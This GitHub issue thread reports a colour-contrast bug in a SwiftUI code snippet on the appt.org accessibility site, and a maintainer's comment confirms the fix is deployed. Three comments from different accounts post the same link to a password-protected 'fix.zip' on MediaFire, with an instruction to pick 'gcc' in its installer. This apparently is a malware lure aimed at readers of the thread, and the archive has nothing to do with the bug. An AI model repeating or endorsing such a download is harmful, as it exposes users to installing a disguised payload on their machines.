### ISSUE TITLE
Color contrast issue on code snippet for SwiftUI

### ISSUE THREAD

**Issue by fbernutz** [appt-org/appt-website#62]
**Describe the bug**
There's a color contrast issue on a code snippet where a part of the code is not readable in light mode.

**To reproduce**

1. Go to https://appt.org/en/docs/swiftui/samples/accessibility-value in light mode
3. Scroll down to the Swift snippet
4. The "progress" in the snippet is light gray on white and not readable.

**Expected behavior**
It should probably be black, since on dark mode the "progress" variable has the same color as the other "progress" in the code snippet.

**Screenshots**

Light Mode: 
<img width="846" alt="Screenshot 2024-08-26 at 09 23 03" src="https://github.com/user-attachments/assets/79cbf123-49e1-4322-8e2e-cc158755084f">

Dark Mode:
<img width="855" alt="Screenshot 2024-08-26 at 09 22 57" src="https://github.com/user-attachments/assets/3c3fe015-0717-43e5-940b-9f6e86c11c48">

**System**
Please provide the following information:

- Device: Macbook Pro
- OS: macOS
- OS version: 14.6.1
- Browser Chrome
- Browser version: 127.0.6533.120

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JJdeGroot** [comment]
Hi @lisaklein & @laylahoogeveen thanks for fixing this!

Just deployed the changes to production. @fbernutz thanks again for letting us know. You might need to force refresh the CSS to see the change.
